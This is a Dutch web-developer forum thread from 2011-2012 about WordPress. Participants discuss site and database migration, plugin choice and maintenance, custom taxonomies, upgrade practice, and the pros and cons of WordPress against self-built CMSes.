Het grote WordPress topic

Pagina: 1 ... 5 ... 9 Laatste
Acties:

Onderwerpen

Acties:
  • 0 Henk 'm!

• JeroenH
  • Registratie: Januari 2003
  • Nu online
De afgelopen paar dagen bezig geweest om mijn website te migreren van het oude platform (PHP4/MySQL4/WP3.2/Kubrick theme) naar het nieuwe (PHP5/MySQL5/WP3.3/TentyEleven theme). Meer werk dan ik dacht, maar wel lekker Tweaken :-)

Ik vind het gek dat die standaardthema's standaard ingesteld staan op "laat geen sidebar zien bij individuele posts en pages" en dat er geen eenvoudige mogelijkheid is om die sidebar in te schakelen. Ik heb het nu voor elkaar met wat hackwerk, maar dat zou toch niet nodig hoeven zijn?

Ik heb ook de uploads directory gekopieerd, maar helaas zijn alle uploads niet zichtbaar vanuit de WP beheersinterface. Ik hoop maar dat dat allemaal meekomt als ik de database kopieer.

De database kopiëren is iets waar ik nog wel een beetje tegenaan hik... het kan op een paar manieren en ik probeer erachter te komen welke de beste is. Iemand tips?

Xtool D1 10w laser cutter - IoT moet nooit op internet - 3x HomeWizard plug-in batterij, totaal 8,1 kWh / 2400 watt / 2400 watt, aansturing met Home Assistant

Acties:
  • 0 Henk 'm!

• Jejking
  • Registratie: Februari 2005
  • Niet online

Jejking

It's teatime, doctor!

JeroenH schreef op woensdag 21 december 2011 @ 15:31:
De multiple-language plugin die ik gebruik (Qtranslate) is ook bijgewerkt en ondersteunt nu Wordpress 3.3. Vanavond upgraden! Ik ben vooral benieuwd naar hoe de nieuwe beheersinterface werkt.
* Jejking zat eerst met Ben Translate, dit ziet er iets professioneler uit. Die 'live' vertalingen zijn toch niet interessant, maar hoe je de automatische translator nou precies aanzet? Voor m'n content lukt het me niet in ieder geval. Moet je deze nog ergens enablen?

PS: WP3.3 werkt erg lekker :)

Trouwens, hoeveel plugins hebben jullie nou eigenlijk allemaal gemiddeld draaien?

* Jejking vindt z'n 20+ toch wel aan de hoge kant...

Alleen voor de bescherming al heb ik er drie of vier uit m'n hoofd.
8088 schreef op dinsdag 20 december 2011 @ 01:30:
Met vertalen bedoelde ik dat je het onderdeel van de automatische tagger (zoals Simple Tags of een van de tig andere, toch?) dat in het Nederlands zou moeten zijn eenvoudigweg zelf zou kunnen vertalen.
Jij probeert dus te zeggen, pak een auto tagger en de results terug naar het Nederlands vertalen? De twee taggers die ik probeerde, kwamen allemaal met belangrijkste tags als 'een', 'de', 'het', aanzetten in ieder geval. Zou dat zichzelf uit moeten kristalliseren over de tijd ofzo? Lijkt me niet omdat het per bericht gaat, zo'n systeem?

[ Voor 77% gewijzigd door Jejking op 27-12-2011 15:29 ]

Acties:
  • 0 Henk 'm!

• 8088
  • Registratie: December 2000
  • Niet online

8088

NaN

Jejking schreef op dinsdag 27 december 2011 @ 15:24:
Jij probeert dus te zeggen, pak een auto tagger en de results terug naar het Nederlands vertalen?
Die zin begrijp ik niet. Wat ik probeerde duidelijk te maken is dat ik geen idee heb wat je met 'Nederlands' bedoelt. Je hebt namelijk nog steeds niet aangegeven welk aspect (de documentatie? de interface? de tags zelf?) van de tagger Nederlands moet zijn en waarom dat een probleem oplevert.
De twee taggers die ik probeerde, kwamen allemaal met belangrijkste tags als 'een', 'de', 'het', aanzetten in ieder geval. Zou dat zichzelf uit moeten kristalliseren over de tijd ofzo? Lijkt me niet omdat het per bericht gaat, zo'n systeem?
Geen flauw idee. Over welke taggers heb je het? Welke instelmogelijkheden heb je? Heb je de code al bekeken? Wat zeggen de auteurs?

Zonder te beloven dat ik je er überhaupt verder mee kan helpen, voorspel ik wel dat als je een duidelijke opsomming maakt van de eisen waaraan de tagger moet voldoen en waarom en welke taggers die je geprobeerd hebt er niet aan voldoen, de kans op advies en/of hulp een stuk groter wordt.

Do you seek to engage in or have you ever engaged in terrorist activities, espionage, sabotage, or genocide?

Acties:
  • 0 Henk 'm!

Verwijderd

JeroenH schreef op dinsdag 27 december 2011 @ 15:08:
De database kopiëren is iets waar ik nog wel een beetje tegenaan hik... het kan op een paar manieren en ik probeer erachter te komen welke de beste is. Iemand tips?
Databases overzetten doe ik meestal met BackupBuddy en dat gaat eigenlijk altijd gewoon goed (alleen met de "full backup"-optie, die ook de files meeneemt, heb ik problemen gehad).

Als je niet wil betalen voor de plugin of als het een bijzonder grote database betreft zou ik de DB overzetten via SSH (exporteren met mysqldump en daarna importeren via mysql). Vervolgens moet je nog even alle occurences (indien van toepassing) van je oude domein vervangen door je nieuwe domein in - uit mijn hoofd - sowieso de tabellen wp_options (kolom option_value), wp_posts (kolom post_content) en wp_postmeta (kolom meta_value). Dat kan met een paar UPDATE-queries.

Acties:
  • 0 Henk 'm!

• Jejking
  • Registratie: Februari 2005
  • Niet online

Jejking

It's teatime, doctor!

@8088, ik heb je even een DM gestuurd :)

Acties:
  • 0 Henk 'm!

• apekoek
  • Registratie: Mei 2007
  • Laatst online: 14-11-2023
De attachements/files die mee verzonden worden met het formulier van Contact Form 7 worden uiteraard naar mijn mail gestuurd, echter wil ik dat deze uploads ook opgeslagen worden op mijn server. Hoe moet ik dat doen? De standaard CF7 upload folder blijft leeg...

Acties:
  • 0 Henk 'm!

• TheNephilim
  • Registratie: September 2005
  • Laatst online: 12-09 14:37

TheNephilim

Wtfuzzle

Trouwens, hoeveel plugins hebben jullie nou eigenlijk allemaal gemiddeld draaien?

Alleen al voor bescherming 3 á 4? Dat vind ik best wel veel eigenlijk, Wordpress is van zichzelf veilig genoeg toch? Er zijn wel wat security plugins, maar de meesten zijn bloated en doen veel meer dan eigenlijk nodig is.

Verder kan ik zeggen dat ik toch gauw 5 plugins heb draaien. Van formulieren maak ik altijd een plugin, dus 1 plugin voor elk formulier. Dan soms nog teaser-plaatjes van fotoalbums of iets dergelijks. Toch val ik ook nog wel eens terug op het hardcoden van een functionaliteit in een template.
Laatst had ik een website die een voorpagina had met andere template dan de rest, dus gewoon front-page.php en daar alle content-sliders, feeds en weet ik het wat in gezet.

Moet nu mezelf nog eens verdiepen in custom taxonomies, daar heb ik nog geen kaas van gegeten. Nu werk ik veel met categorieën en berichten, maar voor sommige dingen is het handiger om een custom taxonomy aan te maken heb ik begrepen.

Gebruikt iemand hier veel custom taxonomies?

Acties:
  • 0 Henk 'm!

• Nedra
  • Registratie: Juli 2006
  • Laatst online: 17-10-2023
Yes! Tja je kan custom taxonomies op vele manieren gebruiken. Als bijv. extra categorieën om je onderwerpen gescheiden te houden of dergelijke, maar je kan het ook gebruiken als back-end menu item op zich. Als je bijv. een portfolio site maakt, kan je de 'posts' voor de blogposts houden, en een custom taxonomy ' portfolio' aanmaken, met daar evt. weer categorieën onder. Het grote voordeel is dat je klant in een oogopslag ziet waar deze z'n portfolio dingetjes moet uploaden als deze inlogt. Al helemaal als je veel verschillende elementen op een site hebt - blog, portfolio, shop, nieuws, links, etc. is het verduidelijkend. Ook geeft het je natuurlijk weer een hoop extra hooks om dingen te customisen. Posts? Laat de normale text-editor zien. Portfolio? Alleen een klein tekst veldje + image upload. Links? Alleen een URL veld en categorie selectie. Dat soort dingen :).

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Nedra schreef op maandag 02 januari 2012 @ 15:08:
Yes! Tja je kan custom taxonomies op vele manieren gebruiken. Als bijv. extra categorieën om je onderwerpen gescheiden te houden of dergelijke, maar je kan het ook gebruiken als back-end menu item op zich. Als je bijv. een portfolio site maakt, kan je de 'posts' voor de blogposts houden, en een custom taxonomy ' portfolio' aanmaken, met daar evt. weer categorieën onder. Het grote voordeel is dat je klant in een oogopslag ziet waar deze z'n portfolio dingetjes moet uploaden als deze inlogt. Al helemaal als je veel verschillende elementen op een site hebt - blog, portfolio, shop, nieuws, links, etc. is het verduidelijkend. Ook geeft het je natuurlijk weer een hoop extra hooks om dingen te customisen. Posts? Laat de normale text-editor zien. Portfolio? Alleen een klein tekst veldje + image upload. Links? Alleen een URL veld en categorie selectie. Dat soort dingen :).
Ah precies! Thnx, dat geeft duidelijk antwoord op m'n vraag. Gauw maar eens tijd vinden om me wat verder in te lezen in Wordpress. Sinds een half jaartje met Wordpress aan het werk en de basis goed te pakken. Ik leer altijd door iets te doen, maar nu ben ik toch maar eens toe aan veel leeswerk. Normaal beetje lezen, uitproberen :P

Inderdaad voor een klant duidelijker waar hij/zij iets moet toevoegen omdat het meteen in het menu staat.

Bedankt voor je reactie! :D

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Wordpress 3.3.1 is inmiddels geariveerd: meuk: WordPress 3.3.1

Hier al mensen druk aan het upgraden? Hoe rollen jullie trouwens de upgrades uit bij een groot aantal klanten?

Acties:
  • 0 Henk 'm!

• Nedra
Ik heb nog niet alles geupgrade. Van veel sites heb ik lokaal een spiegel staan die ik als eerst upgrade. Als dat zonder noemenswaardige problemen gaat maak ik een back-up van de site die ik wil upgraden en doe ik een upgrade. Afhankelijk van het verkeer van de site probeer ik het op een rustig moment te doen, indien er dan toch problemen opspelen hebben zo min mogelijk mensen er last van. Ik moet wel zeggen dat ik nog nooit grote problemen bij een update heb gehad, de keren dat ik een probleem had zijn op één hand te tellen, en waren meestal kleine dingen met plugins.

Acties:
  • 0 Henk 'm!

• kwaakvaak_v2
  • Registratie: Juni 2009
  • Laatst online: 02-06 12:29
Ben ik dan een van de weinige ontwikkelaars die echt moedeloos wordt van het ontbreken van een fatsoenlijk datamodel?

Afgelopen week bezig geweest om een site te maken met wordpress en de custom-content-type manager en shiba-media library plugins. Maar in tegenstelling tot wat ik verwacht had word er geen tabel aangemaakt voor die content types en moest ik met unserialize aan de slag om data uit een database te trekken.

PHP:
1
2
3
4
5
6
7
8
9
10
  $meta  = get_post_custom($gallery_id);
    $attached = unserialize($meta['_menu_order'][0]);
    $images = array();
    if (count($attached) > 0){
        foreach($attached as $post => $temp){
            $file = wp_get_attachment_image_src($post,false);
            $images[] = $file[0];
        }
    }
    return $images;

En om naar te zwijgen over de manier waarop plugins en themes content en html door elkaar gooien. Nu weet ik wel dat, dat deels inherent is aan het wordpress systeem en dat PHP volgens vele mensen toch maar een uitgebreide template engine is. Maar ano 2011/2012 zakt hier mijn broek toch vanaf. Dus nee.. tenzij iemand mij verteld dat ik het niet goed begrepen heb, schrijf ik wordpress bij deze als potentieel systeem wat ik voor klanten in wil zetten af.

Driving a cadillac in a fool's parade.

Acties:
  • 0 Henk 'm!

• Nedra
Vast niet, maar ik heb er in ieder geval weinig problemen mee. Een open-source CMS is altijd een kwestie van inleveren op functionaliteit en schone code. Anders ontkom je niet aan het schrijven van je eigen CMS. In dit geval weet ik niet precies wat je doel is, maar waarom gebruik je de custom-content-type manager? kan je niet veel beter je eigen taxonomies declareren en daar je eigen 'custom fields' aan hangen? zomaar een gedachte..

Acties:
  • 0 Henk 'm!

• kwaakvaak_v2
Als ik eigen taxonomies met custom fields moet declaren, en daar zelf ook de bijpassende DB code voor moet gaan maken is het niet zo heel veel meer werk om inderdaad dan maar alles zelf te maken. De meerwaarde van een CMS met een custom fields optie zou voor mij juist zijn dat die er voor moet zorgen dat ik minder hoeft te doen. Niet meer, of het alsnog zelf. In dit geval biedt wordpress mij dus niet veel meer dan wat bijvoorbeeld symfony2+adminbundle of drupal 7 zou kunnen bieden.

Ik probeer te doorgronden waarom wordpress op dit moment het nieuwe gesneden brood lijkt te zijn, en tot op heden kan ik daar vanuit developer oogpunt niet de vinger opleggen. Behalve dat er heel veel themes voor te vinden zijn waarodoor je snel visueel resultaat hebt.

Ik begrijp dat je functionaliteit moet inleveren op het moment dat je voor een CMS kiest, maar ik begrijp eerlijk niet waarom mensen zo lyrisch zijn over wordpress als het elementaire dingen als een fatsoenlijk DB model niet eens uit de doos kan leveren. En ik denk dat het een leuk platform is voor als je snel iets in de lucht wilt hebben, waarvan je al op voorhand kunt voorspellen dat je klant nooit meer wilt dan die 'brochure' site. Maar op het moment dat je er meer mee wilt en koppeling met andere systemen mee wilt gaan maken je al heel snel tegen de beperkingen van het CMS op loopt. En alsnog heel veel wielen zelf moet uitvinden, maken en monteren.

Acties:
  • 0 Henk 'm!

• Freeaqingme
  • Registratie: April 2006
  • Laatst online: 13-09 18:54
Hoe werken jullie met wordpress in een otap straat? Ik kan niet echt een praktische oplossing vinden. Dan met name op het gebied van het syncen van databases (nieuwe content op productie, nieuwe plugins op development, etc)

No trees were harmed in creating this message. However, a large number of electrons were terribly inconvenienced.

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

@kwaakvaak_v2: Ik snap wat je bedoeld, je bent toch een beetje gelimieteerd in wat je kunt doen. Aan de andere kant is het schrijven van een eigen CMS erg leuk, maar een fatsoenlijk template systeem zoals Wordpress heeft, ga je dan wel snel missen denk ik.
Je zou inderdaad makkelijker met de DB moeten kunnen communiceren, daar liep ik laatst ook tegenaan.

Acties:
  • 0 Henk 'm!

• masq
  • Registratie: September 2004
  • Laatst online: 18-04 00:18
Freeaqingme schreef op zondag 08 januari 2012 @ 15:00:
Hoe werken jullie met wordpress in een otap straat? Ik kan niet echt een praktische oplossing vinden. Dan met name op het gebied van het syncen van databases (nieuwe content op productie, nieuwe plugins op development, etc)
Had je deze plugin al gevonden? Nog niet zelf gebruikt (licensie kost $99), maar het ziet er wel erg goed uit.

Acties:
  • 0 Henk 'm!

• kwaakvaak_v2
TheNephilim schreef op zondag 08 januari 2012 @ 17:14:
@kwaakvaak_v2: Ik snap wat je bedoeld, je bent toch een beetje gelimieteerd in wat je kunt doen. Aan de andere kant is het schrijven van een eigen CMS erg leuk, maar een fatsoenlijk template systeem zoals Wordpress heeft, ga je dan wel snel missen denk ik.
Je zou inderdaad makkelijker met de DB moeten kunnen communiceren, daar liep ik laatst ook tegenaan.
ik vind persoonlijk twig een behoorlijk fatsoenlijke template engine. Sterker nog, ik zou graag gezien hebben dat die wat makkelijker naar wordpress te krijgen was. Maar vanmiddag nog wat verder met wordpress gespeeld, en het is een grappig systeem voor snel resultaat maar het is niets voor mij. Voel mij teveel gelimiteerd door het te simpele karakter van het systeem.

Plus er zijn teveel mensen die voor 15 a 25 euro per uur wordpress diensten doen en daar wil en kan ik niet mee concureren. Ik kan niet 80 uur per week declarabel werken ;)

[ Voor 10% gewijzigd door kwaakvaak_v2 op 08-01-2012 19:19 ]

Acties:
  • 0 Henk 'm!

• ZpAz
  • Laatst online: 14-09 21:52

De grootste wordpress site qua functionaliteit die ik ooit gemaakt heb (http://desalvator.nl) heeft 28 plugins, en die site heeft echt vrij veel mogelijkheden. Gemiddeld zal ik niet op 5 komen.

[ Voor 3% gewijzigd door ZpAz op 08-01-2012 20:06 ]

Tweakers Time Machine Browser Extension | Chrome : Firefox

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

kwaakvaak_v2 schreef op zondag 08 januari 2012 @ 19:15:
ik vind persoonlijk twig een behoorlijk fatsoenlijke template engine. Sterker nog, ik zou graag gezien hebben dat die wat makkelijker naar wordpress te krijgen was. Maar vanmiddag nog wat verder met wordpress gespeeld, en het is een grappig systeem voor snel resultaat maar het is niets voor mij. Voel mij teveel gelimiteerd door het te simpele karakter van het systeem.

Plus er zijn teveel mensen die voor 15 a 25 euro per uur wordpress diensten doen en daar wil en kan ik niet mee concureren. Ik kan niet 80 uur per week declarabel werken ;)
Op het moment probeer ik juist te kijken wat nou de mogelijkheden zijn, als je toch wat uitgebreidere dingen wil doen met Wordpress. Ik ontwikkel nu een klein poosje websites in Wordpress en ik probeer nu een Webshop module te ontwikkelen. Er zijn er al een groot aantal, maar het is meer om m'n eigen kennis een beetje te vergroten.

Het enige probleem waar ik op dit moment mee zit is het aanmaken van een waarde bij een custom taxonomy die per post aan te passen is. Kort gezegd, ik heb een taxonomy uitvoeringen, waarbij je bijv Maat en dan -S, -M, -L invoerd als child. Dan wil ik graag voorraad per maat kunnen invoeren, per product natuurlijk. Ik ben er nog niet uit hoe ik dat ga oplossen, maar het moet netjes! :P
In de eCommerce plugin maken ze per uitvoering/maat/variatie/etc een extra product aan. Dus standaard is er één product per uitvoering.

Pfoe het is weer maandagochtend! :O

Acties:
  • 0 Henk 'm!

• kwaakvaak_v2
In de eCommerce plugin maken ze per uitvoering/maat/variatie/etc een extra product aan. Dus standaard is er één product per uitvoering.
Dat klinkt niet geheel onlogisch omdat voor bijna alle producten behalve kleding telt dat een andere maat/kleur ook een andere SKU heeft. Bij kleding is het juist een product eigenschap waarbij de SKU wel gedeeld wordt. En dat is nu typisch iets wat je in een datamodel oplost... En daarmee heb je dus gelijk de achilles-hiel van wordpress te pakken. Wil je meer ben je of bezig het op één of andere kromme manier in een metabox/field te stoppen of logica er naast te bouwen waarbij wordpress eigenlijk niet meer wordt dan je router/media/page storage. En dan zijn er veel boeiende alternatieven te vinden.

Mijn conclusie is, wordpress is een erg mooi platform als je snel wat wilt opzetten, en meer moet je er ook niet mee willen doen. Dus ik ga het misschien inzetten, als ik een klant heb met een laag budget die toch wat moois wilt qua uiterlijk. Want eerlijk is eerlijk, wordpress heeft van alle systemen wel de beste commercieel beschikbare templates. En dat is denk ik ook de grootste kracht, hun aantrekkingskracht op de freelance ontwerpers :)

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Nou inmiddels al een heel eind verder, maar kan geen manier vinden om data te posten in een custom field in een eigen form. Het maken van een eigen custom field is het probleem niet, heb de opmaak daarvoor inmiddels ook. Nu moet ik tussen de combinaties (bijv. maat: L, kleur: Rood) een link leggen en om dan de gehele admin page te gaan updaten lijkt met niet de manier. Dus een checkbox per uitvoerings-set aan klikken en dan een plusje met voorraad.

Is er hier iemand die weet hoe je een custom form in je custom meta field realiseerd?

De maandag is al weer bijna voorbij, tenminste wat werkuren betreft. Had grote moeite met opstarten, maar dat zal te maken gehad hebben met dit weekend :P Als het in de komende weken nog enkele websites in elkaar draaien met websites voor klanten. Het is nog even wachten op de designs XD

Acties:
  • 0 Henk 'm!

• rvtk
  • Registratie: Juni 2001
  • Laatst online: 14-09 21:17
JeroenH schreef op dinsdag 27 december 2011 @ 15:08:
Ik vind het gek dat die standaardthema's standaard ingesteld staan op "laat geen sidebar zien bij individuele posts en pages" en dat er geen eenvoudige mogelijkheid is om die sidebar in te schakelen. Ik heb het nu voor elkaar met wat hackwerk, maar dat zou toch niet nodig hoeven zijn?
Ik vind dat ook vrij suf, zeker omdat er tegenwoordig juist lekker wat sidebar ruimte is aangezien bijna iedereen op meer dan 1000 pixels breedte zit qua resolutie.

In plaats van zelf in de code lopen hacken, kan je of een child theme maken of gebruik een plugin, hoef je zelf het wiel niet opnieuw uit te vinden:
http://wordpress.org/exte...-eleven-theme-extensions/

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Je zou denken dat als je 'public' => false en 'show_in_nav_menus' => true opneemt als argumenten bij het registreren van een custom taxonomy, dat hij niet bij het wijzigen van een post staat, maar wel in het menu om ze toe te kunnen voegen etc.
Dat is alleen niet het geval, waarom bestaan deze opties dan :S Als alleen 'public' z'n werk doet...

Acties:
  • 0 Henk 'm!

• Scr33x0r
  • Registratie: September 2004
  • Laatst online: 08:16
Op het moment ben ik werkzaam bij een bedrijf dat met name websites oplevert in WordPress. In het verleden heb ik altijd mijn eigen CMS'en geschreven, maar iets meer dan 1,5 jaar terug hebben we de keuze gemaakt om te gaan ontwikkelen op WordPress. De reden hiervoor was simpel, als ik een keer weg wilde, hadden we geen probleem. Ondertussen hoefden we dan ook niet moeilijk te doen als een klant een keer een andere partij in wil huren voor het onderhoud aan de website of is het voor ons makkelijker om freelancers/andere developers in te zetten.

Wij hebben nu een aantal grote websites in beheer die allen draaien op WordPress en waarbij bij mij enige frustratie begint op te spelen sinds de laatste paar updates (3.1 > 3.2). Een artikel onlangs geschreven door Kevinjohn Gallagher (http://purewebbrilliant.com/) waarin hij eigenlijk de spijker op zijn kop slaat:

http://kevinjohngallagher...ss-has-left-the-building/

Ook ik kom steeds vaker dit soort zaken tegen, en daarnaast zou ik hier eens een discussie met jullie over willen voeren. Maar ook vraag ik me af hoe andere, in WordPress gespecialiseerde bedrijven, hiermee omgaan. Waar letten jullie op bij het gebruiken van plugins? En hoe zorg je ervoor dat, mocht de plugin niet verder wordt ontwikkeld, dat je niet voor incompatibiliteitsproblemen komt te staan bij een eventuele upgrade van WordPress.

Ik loop soms tegen plugins aan die een jaar geleden nog goed en actief ontwikkeld werden en nu opeens niet meer werken. Het lullige is als je dan content, die een jaar lang is ingevoerd, moet omzetten naar een plugin die wel werkt. En tuurlijk zijn daar workarounds voor, of ik schrijf mijn eigen script voor de database, maar het blijft extra werk. Daarnaast moet ik dit soort tijd nu ergen in steken terwijl dat mijn klanten er eigenlijk niet voor willen betalen.

Ik ben benieuwd hoe jullie met dit soort problemen om gaan en dit is eigenlijk ook altijd voor mij een reden geweest om juist niet OpenSource te ontwikkelen en juist te kiezen voor een eigen CMS etc.

Acties:
  • 0 Henk 'm!

• kwaakvaak_v2
Wat jij beschrijft is bij elk OSS product de grootste valkuil, en of dat nu wordpress, drupal of umbraco is. Op het moment dat een grotere club achter een plugin/module zit is er meestal niets aan het handje. Immers zij gebruiken die module ook voor hun dagelijkse zaken. Op het moment dat een plugin gemaakt wordt door een hobyist in zijn vrije tijd begint het probleem. Op het moment van schrijven heeft die maker alle interesse voor dir plugin. Immers hij krabt aan zijn eigen jeuk.

Maar op een bepaald moment is de jeuk over of krijgt ie ergens anders jeuk. Maar zijn module wordt nog wel gebruikt door andere mensen, met als gevolg dat die mensen ook verwachten dat hij support blijft leveren op iets waar ie al lang geen interesse meer in heeft.

Zorg er dus bij het kiezen van een module niet alleen voor dat je weet waar die vandaan komt, maar ook dat mocht het nodig zijn voor :
* Kijk of je of de module kunt forken en er zelf mee verder gaat mocht de maker afhaken.
* De maker open staat voor patches en die ook op redelijke termijn door voert.
* En belangrijkste, doe een code review. Snap je de code, is de code veilig etc. etc.

Terug naar zelf ontwikkelen, en dat is iets wat denk ik in de aard van elke ontwikkelaar zit. Dit is niet goed, en ik kan het beter. Goede instelling, maar niet altijd gezond. In de afgelopen 12 jaar dat ik websites bouw ben ik behoorlijk vaak code tegen gekomen van systemen die door bedrijven zelf zijn gemaakt. Op basis van bestaande componenten, of frameworks. En ben daar minstens zo schuldig aan, heb denk ik een CMS of 5 bedacht en gebouwd tot op heden. En daar telt deels het Jeuk & Krabben verhaal voor, maar ook een deel angst dat klanten weg lopen op het moment dat je iets met een OSS systeem bouwt. Dus maken een ze vendor lock. Je moet wel bij ons blijven, want niemand anders snapt dit systeem.

De denkfout daarin is, als je klant weg wilt bij je, komt dat niet doordat je iets met OSS gemaakt hebt, en hij het voor een paar dubbeltjes minder bij iemand anders kan laten onderhouden. Dan is er wel degelijk meer verstoord in je klant relatie.

"Daarnaast moet ik dit soort tijd nu ergen in steken terwijl dat mijn klanten er eigenlijk niet voor willen betalen."

Ja... en die tijd moet je niet in je eigen software steken want die is 100% perfect?

Dat is nu het voordeel van OSS, jij fixt iets en geeft dat terug, iemand anders fixt ook iets en geeft dat terug. Beide hebben daar voordeel van, en beide kunnen klanten blij maken met een mooie oplossing. Power in numbers dus, meer ontwikkelaars dan een bedrijf ooit kan betalen om aan een gesloten systeem te werken.

Maar deze discussie staat eigenlijk los van wordpress. Het is meer een keuze. Of je kunt leven met de code van iemand anders, of je kunt leven met het feit dat iemand anders ook geld verdient met jouw code. Als je dat niet kunt, moet je NOOIT aan een OSS systeem beginnen en lekker alles zelf blijven maken. Maar dan ook echt alles.. En ik denk, en ben er echt van overtuigd, dat alleen OSS gaat overleven op de lange termijn en dat er nog meer een verschuiving in web-land gaat plaats vinden dat er alleen betaald wordt voor onderhoud en implementatie van een oplossing. En niet meer betaald gaat worden voor licentie kosten.

[ Voor 0% gewijzigd door kwaakvaak_v2 op 13-01-2012 15:48 . Reden: alinea/zinsbouw ]

Acties:
  • 0 Henk 'm!

• joppe113
  • Registratie: Maart 2007
  • Laatst online: 14-09 19:31
Goed topic dit. Ben druk met eerste wordpress site bezig!

Acties:
  • 0 Henk 'm!

• Chip.
  • Registratie: Mei 2006
  • Niet online
@kwaakvaak_v2 ik doe het vaak anders... Als ik een bepaalde plugin zoek, kies ik vaak voor diegene die het meest word gebruikt... kans is dan groter dat mocht de developer het bijltje erbij neerleggen iemand anders het stokje wel overneemt :P simpel maar al vaak genoeg effectief bewezen.

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Wij gebruiken hier nu iets meer dan een half jaar Wordpress en dat heb ik langzaam aan geleerd. Je krijgt eens een opdracht, besluit die in Wordpress te gaan ontwikkelen. De tijd die nodig was voor een eigen CMS was er niet en we hebben nog enkele projecten lopen, dus het onderhoud voor een CMS gaat gewoon niet lukken.

Dus aan de slag met Wordpress; erg gebruiksvriendelijk voor klanten, door de updates in Wordpress ben je redelijk up-to-date wat betreft de laatste 'technieken' op het web en doordat het zoveel gebruikt word is er genoeg te vinden over Wordpress en alles wat er bij hoort.

Ik heb een aantal plugins die ik vaak gebruikte, maar op dit moment probeer ik wat meer dingen zelf te schrijven. Zoals (heel simpel) een contact formulier, eerst gebruikte ik een plugin van een ander, nu heb ik zelf wat in elkaar gezet. Elke klant wil namelijk andere velden en het design van een contact formulier is steeds anders. Dus gewoon een plugin waar je de html aan moet passen, maar waar de core wel hetzelfde blijft.

Happy Wordpress developing here, maar er is nog veel te leren als het om Wordpress gaat. Bij elke website vind ik wel weer wat nieuws uit. Het enige wat ik beter moet gaan doen is m'n code beheren. Ik weet nog niet goed hoe ik Wordpress in SVN krijg, je hebt steeds andere websites die je maakt, lijkt me lastig omdat netjes in SVN te krijgen zonder dat het steeds veel werk is (nieuw repo maken etc). Ook code die ik al eens geschreven heb moet ik vaker in een plugin zetten ipv puur in een template of iets dergelijks. Het nadeel blijft de verschillen in een website. De ene contentslider is (bijv.) alleen foto's, de ander met tekst en weer een ander is veel groter/kleiner etc.

Acties:
  • 0 Henk 'm!

• kwaakvaak_v2
Wouser schreef op woensdag 18 januari 2012 @ 01:49:
@kwaakvaak_v2 ik doe het vaak anders... Als ik een bepaalde plugin zoek, kies ik vaak voor diegene die het meest word gebruikt... kans is dan groter dat mocht de developer het bijltje erbij neerleggen iemand anders het stokje wel overneemt :P simpel maar al vaak genoeg effectief bewezen.
hehe.. ja maar dat is dus precies hetzelfde als die top 25 lijstjes in bijvoorbeeld de itunes store. Mensen klikken op dat lijstje en installeren apps die in dat lijstje staan. Met andere woorden, er kan misschien een beter alternatief zijn, maar als die niet in een top lijst staat wordt die nooit gezien.

Dat vind ik te kortzichtig, ik heb liever iets wat minder populair is en kwaliteit heeft, dan als een lemming achter de kudde aan te lopen :)

Acties:
  • 0 Henk 'm!

• wjzijderveld
  • Registratie: Augustus 2005
  • Laatst online: 23-08 10:55
kwaakvaak_v2 schreef op woensdag 18 januari 2012 @ 11:46:
Dat vind ik te kortzichtig, ik heb liever iets wat minder populair is en kwaliteit heeft, dan als een lemming achter de kudde aan te lopen :)
Amen

[ Voor 97% gewijzigd door wjzijderveld op 18-01-2012 12:07 ]

Canon EOS60D | Canon 100mm f/2.8 USM | Canon 100-400mm f/4.5-5-6L | Canon 10-22mm f/3.5-4.5 USM | Canon 430EX II

Acties:
  • 0 Henk 'm!

• JeroenH
  • Nu online
Scr33x0r schreef op vrijdag 13 januari 2012 @ 14:04:
Waar letten jullie op bij het gebruiken van plugins? En hoe zorg je ervoor dat, mocht de plugin niet verder wordt ontwikkeld, dat je niet voor incompatibiliteitsproblemen komt te staan bij een eventuele upgrade van WordPress.

Ik loop soms tegen plugins aan die een jaar geleden nog goed en actief ontwikkeld werden en nu opeens niet meer werken.
Goede vraag. Ik heb er nog niet mee te maken gehad, maar het moet er een keer van komen. Ik heb op mijn site (zie mijn sig) dertien plugins geïnstalleerd. Verreweg de meeste daarvan zijn niet kritisch en/of er zijn meerdere versies van en dus geen probleem.

Over eentje maak ik me wel zorgen, en dat is mijn meertaligheidsplugin Qtranslate. Het is een erg goede plugin die goed wordt bijgehouden. Ongeveer één of anderhalve week na een Wordpress-update is de plugin ook wel bijgewerkt. Dat gaat al twee jaar prima.

Maar het baart me zorgen dat dit een plugin is die door één amateur wordt bijgehouden. (Amateur als in, hij doet het niet voor het geld, niet amateur als in hij doet het niet goed) Als hij op een gegeven moment besluit er mee op te houden om wat voor reden dan ook zit ik mooi met de gebakken peren.

Ik zou alleen niet weten wat ik er aan kan doen. Ik heb destijds grondig onderzoek gedaan naar welke opties er waren voor meertalige WP-websites en dit was veruit de beste. Ik zou zo graag zien dat meertaligheid een ingebouwde functie wordt van WP dan heb ik dit probleem niet meer.

Xtool D1 10w laser cutter - IoT moet nooit op internet - 3x HomeWizard plug-in batterij, totaal 8,1 kWh / 2400 watt / 2400 watt, aansturing met Home Assistant

Acties:
  • 0 Henk 'm!

• Chip.
  • Niet online
kwaakvaak_v2 schreef op woensdag 18 januari 2012 @ 11:46:
[...]

hehe.. ja maar dat is dus precies hetzelfde als die top 25 lijstjes in bijvoorbeeld de itunes store. Mensen klikken op dat lijstje en installeren apps die in dat lijstje staan. Met andere woorden, er kan misschien een beter alternatief zijn, maar als die niet in een top lijst staat wordt die nooit gezien.

Of course ik zeg ook niet dat dat ik meteen diegene pak die het meeste word gebruikt maar het speelt wel in grote maten mee. Is gewoon een kosten-baten analyse ;). Gebruikers <-> Kwaliteit & Lange ondersteuning <-> korte ondersteuning.

Acties:
  • 0 Henk 'm!

• Nedra
Ik moet zeggen dat ik 't nu wel lastig vind dat qTranslate niet goed met 3.3.x werkt. Ik heb een aantal sites die er van afhankelijk zijn nog maar niet geupdate, maar ik ben eigenlijk op zoek naar een goed alternatief. Iemand goede ervaringen met WPML?

Acties:
  • 0 Henk 'm!

• joppe113
